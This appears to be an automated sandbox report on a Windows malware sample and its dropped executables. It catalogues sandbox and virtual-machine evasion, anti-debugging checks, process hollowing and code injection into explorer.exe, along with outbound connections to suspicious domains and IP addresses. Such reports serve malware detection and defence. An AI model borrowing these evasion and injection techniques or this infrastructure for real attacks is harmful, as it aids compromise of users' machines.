                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after checking mutex)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 53DC.exe, 00000016.00000002.420605551.000000000042B000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                      Source: 9ro85QVN0F.exe, 00000001.00000002.340348642.0000000001F60000.00000004.00000001.sdmpBinary or memory string: ASWHOOKW
                      Found evasive API chain (may stop execution after checking locale)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\iscgwerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\iscgwerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\iscgwerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\iscgwerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\iscgwerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\iscgwerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00406AA0
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00666CF0
                      Found evasive API chain (may stop execution after checking computer name)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\explorer.exe TID: 4940Thread sleep count: 576 > 30
                      Source: C:\Windows\explorer.exe TID: 5104Thread sleep count: 181 > 30
                      Source: C:\Windows\explorer.exe TID: 5244Thread sleep count: 196 > 30
                      Source: C:\Windows\explorer.exe TID: 1760Thread sleep count: 388 > 30
                      Source: C:\Windows\explorer.exe TID: 2888Thread sleep count: 97 > 30
                      Source: C:\Windows\explorer.exe TID: 3396Thread sleep count: 342 > 30
                      Source: C:\Windows\explorer.exe TID: 5608Thread sleep count: 106 > 30
                      Source: C:\Windows\explorer.exe TID: 4412Thread sleep count: 127 > 30
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe TID: 488Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 2524Thread sleep time: -210000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 576
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 388
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeAPI coverage: 0.3 %
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeAPI coverage: 6.3 %
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00666CF0
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7480.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\jdijwvkg\bzxmernq.exe (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\433C.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bzxmernq.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\27E3.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\656C.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FE11.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\14F6.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\53A8.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D54.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeAPI call chain: ExitProcess graph end node
                      Source: explorer.exe, 0000000B.00000000.318523624.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000000B.00000000.331623884.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                      Source: explorer.exe, 0000000B.00000000.300992285.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Program""
                      Source: explorer.exe, 0000000B.00000000.318523624.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                      Source: explorer.exe, 0000000B.00000000.329664757.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 0000001D.00000002.457727058.000001A703C6F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWPC
                      Source: explorer.exe, 0000000B.00000000.329664757.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                      Source: svchost.exe, 00000002.00000002.566720985.0000022DCB402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 0000001D.00000002.458320425.000001A703CD9000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.458361159.000001A703CEA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000000B.00000000.318523624.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: svchost.exe, 00000002.00000002.575083417.0000022DCB43C000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.585906895.00000272F7E68000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.573702769.0000021C9DE29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00419AC1 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00668A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_006612E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_006614D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00666090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00669930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00669BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00669D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\iscgwerSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_0042D800 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00630042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_008E5A4A push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 16_2_00560042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_00630042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_00855A4A push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_0066092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00661250 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_0066C3D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00660D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\iscgwerProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_0043B850 IsDebuggerPresent,DebuggerProbe,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_0042CC02 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00419D0A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_004027ED LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeMemory protected: page guard
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_0043AC10 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00422CF0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_0042BD40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_004285A0 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: FE11.exe.11.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\iscgwerSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\iscgwerSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeMemory written: C:\Users\user\Desktop\9ro85QVN0F.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\iscgwerMemory written: C:\Users\user\AppData\Roaming\iscgwer base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeMemory written: C:\Users\user\AppData\Local\Temp\53DC.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeMemory written: unknown base: 400000 value starts with: 4D5A
                      Contains functionality to inject code into remote processesShow sources
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00630110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeThread created: C:\Windows\explorer.exe EIP: 4DE1930
                      Source: C:\Users\user\AppData\Roaming\iscgwerThread created: unknown EIP: 5C11930
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeThread created: unknown EIP: 76B1930
                      Sample uses process hollowing techniqueShow sources
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeSection unmapped: unknown base address: 400000
                      .NET source code references suspicious native API functionsShow sources
                      Source: FD6B.exe.11.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: FD6B.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 26.0.FD6B.exe.cf0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 26.0.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 26.2.FD6B.exe.cf0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 26.2.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 26.0.FD6B.exe.cf0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
